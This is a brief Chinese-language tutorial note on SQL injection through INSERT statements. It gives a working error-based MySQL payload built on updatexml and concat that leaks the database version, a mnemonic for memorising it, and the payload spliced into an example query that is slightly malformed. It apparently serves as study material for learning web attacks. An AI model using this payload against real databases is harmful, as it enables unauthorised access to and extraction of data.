insert 注入
如何向数据库插入数据?
sql语句:insert into users (id,username,sex, password) values (6,'womendouaitony', 'tonyaiwomen');
在这种情况下,应该如何操作可以达到一个注入的效果?
updatexml
payload:
'or updatexml(1,concat(0x7e,(version()),0x7e),0 ) or'
记忆法:
'or or'
updataxml(1,,0)
concat(0x7e,,0x7e)
(version())
拼接进去:
insert into users (id,username,sex,password) values (6,womendouaitony,''or updatexml(1,concat(0x7e,(version()),0x7e),0 ) or'')
updatexml语句用来更新xml数据,第一个参数应该传入更新的数据,但是我们却传入了非法的参数,导致
报错执行version()函数
extractvalue
